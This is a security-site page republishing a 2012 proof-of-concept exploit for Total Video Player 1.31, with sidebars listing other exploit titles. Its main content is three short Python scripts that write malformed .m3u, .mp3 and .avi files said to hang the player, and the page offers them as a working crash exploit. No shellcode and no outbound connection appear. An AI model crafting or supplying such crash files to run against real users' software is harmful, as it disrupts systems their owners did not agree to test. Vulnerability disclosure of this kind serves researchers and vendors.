首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Total Video Player 1.31 .m3u Crash PoC
来源:http://www.effectmatrix.com/ 作者:0dem 发布时间:2012-06-19  

# Exploit Title: Total Video Player 1.31 .m3u Crash Poc
# Date: June 17 2012 
# Exploit Author: 0dem
# Vendor Homepage: http://www.effectmatrix.com/
# Software Link: http://download.cnet.com/Total-Video-Player/3000-2139_4-10552696.html
# Version: V1.31
# Tested on: Windows XP SP 3
# Description:   Total Video Player has no correct input handling and will hang,
#   when trying to open malformed .m3u files. .mp3 and .avi files are affected too

# --- m3u -----------------------------------------------
#!/usr/bin/python
junk = "#EXTM3U\n"
junk += "#EXTINF:666, 0dem, 0dem\n"
junk += "c:\\A"

file = open("PoC.m3u","w")
file.writelines(junk)
file.close()

# --- mp3 -----------------------------------------------
#!/usr/bin/python
junk = "\x41" * 100
file = open("PoC.mp3","w")
file.writelines(junk)
file.close()

# --- avi -----------------------------------------------
#!/usr/bin/python
junk = "\x41" * 100
file = open("PoC.avi","w")
file.writelines(junk)
file.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ezhometech Ezserver 6.4 Stack
·PHP apache_request_headers Fun
·HP Data Protector Client EXEC_
·Microsoft XML Core Services MS
·EZHomeTech EzServer <= 6.4.017
·Karafun Player 1.20.86 .m3u Cr
·Sysax 5.62 Admin Interface Loc
·TFM MMPlayer (m3u/ppl File) Bu
·Adobe Flash Player AVM Verific
·Lattice Semiconductor PAC-Desi
·Lattice Diamond Programmer 1.4
·CastRipper 2.9.6 BOF (bypass A
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved